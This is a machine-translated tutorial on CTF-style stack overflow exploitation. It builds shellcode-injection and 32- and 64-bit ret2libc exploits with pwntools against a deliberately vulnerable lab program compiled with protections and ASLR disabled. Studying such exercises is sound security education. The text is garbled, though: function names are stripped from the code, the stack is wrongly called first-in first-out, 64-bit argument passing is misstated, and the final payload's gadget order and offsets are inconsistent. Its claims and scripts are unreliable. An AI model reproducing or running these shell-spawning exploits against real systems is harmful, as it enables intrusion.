Re:Learning pwn from scratch (stack overflow chapter)

Write in the front: This article aims to help just contact pwn question partners to take some detours, quickly get started pwn question, the content is more basic, big brother light spray. In this article, the default reader understands the meaning of the most basic assembly instructions, and has been configured linux 64-bit environment, understand the basic Linux instructions.

Stacks, Stack Frames and Function Calls

As we know, among data structures, stack is a first-in, first-out data structure. And in the operating system, the stack is generally used to save the state of the function and the local variables in the function.
The stack in Linux is located at the end of the program memory space from theHigh address to low address growth

Stack frame is when a function is called, the independent storage function state and the variables used by the stack space, each function corresponds to a stack frame, the same function called multiple times, each time may be allocated to a different stack frame.

A running function whose stack frame area is bounded by the stack base address register (bp) and the stack top register (sp).

The above is a picture of the stack frame structure of a subfunction when calling a subfunction (32-bit). 64-bit is basically the same, but there are some subtle differences, which will be mentioned later.

On 32-bit systems, a function is called with the following process:

Saving real parameters of a function
Stores the return address at the end of the subfunction
Save parent function stack frame information
Open up space on the stack for local variables
Implementing the function itself
Freeing local variable space used by a function
Recover parent function stack frames based on saved parent function information
Recover the parent function execution flow from the saved return address

Saving real parameters of a function
func(a,b,c), the corresponding assembly instruction is:

push c
push b
push a

Stacking of parameters from right to left

Stores the return address at the end of the subfunction
The assembly instruction at this point is displayed ascall funcinstructions, which are functionally equivalent:

push The address of the next instruction in the current call instruction.
jmp func

Wherein, the push instruction saves the address of the next instruction of the current call instruction into the stack, so that when the execution of the subfunction is finished, it will be convenient to restore the execution flow of the original program according to the address saved therein.
The jmp instruction, on the other hand, jumps to the address of the corresponding function.

Save parent function stack frame information
Go inside the func function, where esp and ebp still hold the parent function stack frame.
Since esp returns to the pre-function call state after the stack space in the child function is completely freed, it is only necessary to save the ebp information and ebp the parent function onto the stack.

push ebp

Subsequently modify the bottom of the stack of the subfunction to be at the current esp

mov ebp,esp

Allocate stack space for subfunctions

sub esp,20h

The above allocates 32 bytes of space for the subfunction. Note that the stack grows from the high address to the low address, so subtracting is done here

Reclaiming stack space after a subfunction finishes executing

add esp,20h

Restore parent function stack frame
At this point the esp is restored to the state it was in just after it was pressed into the parent function's ebp, and you can restore the parent function's ebp, and thus the stack frame

pop ebp

Restore program execution flow

Finally, the current top of the stack is the return address, and the parent function stack information has been recovered, so it is sufficient to modify the program execution flow according to the return address stored on the stack. The corresponding assembly statement is:

retn

This is the entire process of creating and destroying a function stack frame in a 32-bit host.

Whereas in the passing parameter rules followed by most 64-bit hosts, parameters need to be passed through registers, only if there are more than 6 parameters, the excess is passed through registers. The correspondence between registers and parameters is as follows:

Register	Argument
rdi	First Argument
rsi	Second
rdx	third
rcx	fourth
r8	fifth
r9	sixth

try one's hand

With the above theoretical study, the utilization of stack overflow in pwn can be understood from the beginning to the end by following three simple pwn problems.

source program

#include<>
#include<>
void vuln()
{
    char buf[128];
    read(0,buf,256);
}
int main()
{
    vuln();
    write(1,"hello rop\n",10);
}

By analyzing the source code, we know that the above program has an obvious stack overflow vulnerability, which receives an array of 128 bits in size but allows 256 bytes to be read in.

A stack overflow is a situation where user input exceeds the pre-allocated stack space, causing a portion of the data to leak and overwrite other data, such as key variables, return addresses, etc. Through the stack overflow vulnerability, we can modify the program execution flow.

Above is the stack overflow schematic, the user's input is larger than 12 bytes, which overwrites the char* bar, the saved stack base address of the parent function, the return address, and writes the return address to a specific value, in order from the low address to the high address.

Functions commonly associated with stack overflow vulnerabilities are referred to as dangerous functions, and common dangerous functions include:
gets(),scanf(),sprintf(),strcpy(),strcat(),read()etc., consider utilizing stack overflow when encountering these functions.

In our debugging, we need to use a python library, pwntools, which can greatly simplify the pwn process by writing scripts that utilize pwntools.

python create and activate virtual environment (recommended)

python -m venv .venv
source .venv/bin/activate

Install pwntools

pip install pwntools

Test if the installation was successful

python
from pwn import *

If no error is reported, the installation is complete

Question 1 - Executing shellcode on the stack to achieve program flow hijacking

In all three of the following questions, the goal is to get the system's shell.The experimental environment is Ubuntu 24.10

In the first question, our goal is to write our shellcode directly to the stack and overwrite the return address of the function with the address of the shellcode, thus enabling the execution of the shellcode.

The schematic diagram is shown below:

However, modern operating systems generally turn on stack protection, which does not allow direct execution of shellcode on the stack, so we need to turn off stack protection (in order to execute shellcode), and turn off memory address randomization (ASLR) during compilation.

Compile the file as a 32-bit file and turn off stack protection during compilation

gcc  -o rop1 -m32 -fno-stack-protector -z execstack

The -m32 option specifies compilation for 32-bit files, -fno-stack-protector turns off stack protection, and -z execstack allows execution of shellcode on the stack

Turn off system memory address randomization ASLR

su -
echo 2 | tee /proc/sys/kernel/randomize_va_space

Using the checksec tool provided by pwntools, we can check the protection of the file:

checksec rop1

The result of the execution is similar to the one shown below:

A brief description of what some of these parameters mean:

Arch: the architecture of the program, in this case i386-32-little, which means that the program is 32-bit and stores the address on the small side
stack-canary: protection mechanism against stack overflow, before the function starts executing, write a word-length random data at the return address, before the function returns, check whether the value has changed, if it has changed, then it means that the stack has overflowed, and the program will be terminated directly.
NX: In modern operating systems, with NX protection turned on, all memory that can be modified to write shellcode is not executable, and all data that can be executed cannot be modified. Turn it off here
PIE: allows randomized loading of the executable's address, but not turning it off here won't affect the problem.

With the above preparation, we can start working on the questions.

With the source code, we know that the array where the overflow occurred is inside the vuln array, so we set a breakpoint and decompile the vuln function

gdb rop1

Execute at gdb

b vuln
r
disass vuln

From the assembly code, we get the offset of the array, which corresponds to the contents of [ebp-0x88]. That is, the size of the opened array space, and if the input is larger than that, a stack overflow occurs.

With the above schematic, we note that if we wish to complete the overwriting of the return address, in addition to the array offset, we need to add an additional ebp-sized offset for overwriting away the parent function stack frame so that we can later overwrite the return address with ours.

So, we construct the inputs like this:

payload = 0x88*b'a'+0x4*b'b'+return_addr

Note that the character type we pass in here needs to be bytes, i.e. build the payload as a stream of bytes, otherwise we will get an error

The return address points to a shellcode that can call the system shell, which we can generate with the help of pwntools.

shellcode = asm(())

With the above in mind, we write the script, at this point we are not sure of the address of the shellcode, so we trigger the program to crash before making observations:

from pwn import *
p = process('. /rop1')
(p,'b vuln')
shellcode = asm(())
shellcode_addr = 0xdeadbeef # not sure for now
payload = (0x88,'a')+(0x4,'b')+p32(shellcode_addr)
(payload)
() # Enter interactive mode

At this point the program crashes, it will automatically generate a core file in the current directory containing information about the program crash (or maybe not, google how to generate a core file after a program crash)

The stack frame after a program crash looks like this:

Function execution ends, the stack frame is recovered, the esp points to the top of the stack of the parent function, and the distance from the shellcode filled behind the array is 0x88 the size of the array + 0x4*2 the size of the two registers, i.e. 0x90

To test our suspicions, we attached the core file with gdb and looked at the information when the rop1 file crashed

gdb rop1

In gdb, look at the contents of the address at esp-0x90

x/s $esp-0x90

in order tojhhThe string at the beginning is the generated shellcode that opens the shell (you can verify it yourself)

The $esp-0x90 is the address of the shellcode we need. Record that address and populate the script with it

Refine the script to get the shell successfully:

from pwn import *
p = process('./rop1')
shellcode = asm(())
shellcode_addr = your_addr
payload = (0x88,'a')+(0x4,'b')+p32(shellcode_addr)
(payload)
() # Entering Interactive Mode

Question 2 - Implementing Program Stream Hijacking with ret2libc (32-bit)

Compile the program according to the following parameters:

gcc  -o rop2 -m32 -fno-stack-protector

The second question turns on NX (NO execute) protection on top of Experiment 1, which prevents direct execution of shellcode on the stack.

Can't we run shellcode directly, can we do it some other way? Yes, it is inevitable that a program will run with references to external shared libraries. A common library is the libc library (Standard C Library), which provides a set of key functions for GNU/Linux. We can get around this restriction by modifying the program execution flow to execute the functions provided in the libc library.

As shown in the figure, we overwrite the original return address of the subfunction with the address of the function in the libc library, and the subfunction will jump to the corresponding function location after execution.

The ldd command allows us to view the shared libraries used by the file:

ldd rop2

Here we have chosen the libc function as a system function with the parameter/bin/shIn the case of the system function, the return address is not important, because by executing the function system, we have already obtained the shell. In this case, the return address at the end of the execution of the system function is not important, because by executing the function system, we have already obtained the shell.

Since we have turned off ASLR in this question, the system function and the/bin/shThe address of the string in memory does not change after the program starts executing, and you can use gdb to look up both addresses directly after you start debugging:

Outputs the address of the system function:

p system

With vmmap, we look at the current memory address mapping in gdb, determine the start and end address in memory that we are currently using, and try to look for the/bin/shstring (computer science)

vmmap

Its starting address is0xf7ccb000The termination address is0xf7ef4000

Use the find command to find the location of the "/bin/sh" character in the libc library:

find 0xf7ccb000,0xf7ef4000,"/bin/sh"

The result address is the requested

With the destination address clear, we next need to determine the offset, again decompiling the vuln function:

The array size is 0x88, and an ebp size of 0x4 is added to overwrite the parent function stack frame, giving a final offset of 0x8c.

With the above preparation, we write the following script to attach the gdb debugging process to the script:

from pwn import *

p = process('./rop2')
(p,'b main')

sys_addr= int(input("Find out the address of the system function"),16)
binsh_addr= int(input("Find out the address of the /bin/sh string in libc"),16)
payload = b'a'*0x8c + p32(sys_addr)+p32(0xdeadbeef)+p32(binsh_addr) # systemThe return address of the function is not important
(payload)
() # Open Interactive Mode

Fill in the address you get, and you'll get the shell.

Question 3 - ret2libc (64-bit)

Compile the program with the following parameters

gcc  -o rop3 -m64 -fno-stack-protector

As a refresher, 64-bit libc utilizes a different approach than 32-bit, due to a change in the way parameter calls are conventionally made, 64-bit programs will pass parameters through specific registers when making function passes, and only if the number of parameters is more than 6 will the extra parameters be passed through the stack.

Parameters correspond to registers:

And to pass a parameter through a register, we need to find some specific little code snippets (gadgets) through which we pop the parameter from the stack into a register, and then pass the parameter through the register. In this example, the only parameter we need to pass is the/bin/shOne. We can look for similarpop rdi; retA gadget like this

The schematic diagram is shown below:

First we need to look at the shared libraries used by rop3:

ldd rop3

As you can see, the .6 library is used, which is exactly what we need for libc.

Use the ROPgadget tool provided by pwntools to find the gadget we need from the corresponding library

ROPgadget --binary /lib/x86_64-linux-gnu/.6 --only "pop|ret" | grep rdi

will display the result of the match and its value relative to the first address of the file.offset

0x000000000002a44e : pop rdi ; pop rbp ; ret
0x000000000002a255 : pop rdi ; ret
0x0000000000129b4d : pop rdi ; ret 0xfff2
0x00000000000f4d6d : pop rdi ; ret 0xffff

The parameter addresses and system function addresses are obtained in the same way as for the 32-bit ones and will not be repeated here.

Regarding the calculation of offsets, it is important to note that 64-bit offsets are not identical to 32-bit ones and need to be recalculated to decompile the vuln function:

Here, the array offset is 0x80, in order to cover the return address, it is also necessary to add a rbp size, i.e. 0x8, so the total offset is 0x88

With the above information, you can start writing the script:

from pwn import *
p = process('./rop3')
(p,'b main')
sys_addr=int(input("Input the address of the system function: ),16)
binsh_addr=int(input("Input the address of the string /bin/sh: ),16)
pr_addr =int(input("Input the address of the gadget: "),16)
payload = b'a' * 0x80+b'b'*0x8+p64(pr_addr)+p64(binsh_addr)+p64(sys_addr)+p64(0xdeadbeef)
(payload)
()

Execute the script. The execution may fail at this point (if the address of your system function does not end in 0). There is a detail involved here, namely: mainstream compilers in 64-bit operating systems require astack alignmentThat is, the address of the calling function needs to be divisible by 16.

Once we know why, we need to make the call address of the system function +8 or -8 bytes so that the alignment is complete. Usually, we do this by inserting aretThe gadget completes the operation

Looking for ret in .6

ROPgadget --binary /lib/x86_64-linux-gnu/.6 --only 'ret' | grep ret

The following modified script:

from pwn import *

p=process('./rop3')                                           
(p,'b main')                                                                          
system_addr = int(input("Enter the address of the system function: "),16)
binsh_addr = int(input("Find the address of the '/bin/sh' string in .6: "),16)

offset1 = 0x000000000011903c
gadget_start_addr = int(input("Enter the start address of .6: "),16)
gadget_addr = gadget_start_addr+offset1

offset2 = 0x0000000000028a93
ret_addr = gadget_start_addr+offset2

payload = b'a'*0x80 + b'b'*0x8 + p64(gadget_addr)+p64(ret_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef)
(payload)
()

Above, if there are any omissions or mistakes, I implore you to point them out. Hopefully this will help those who are interested in pwn to take the road less traveled!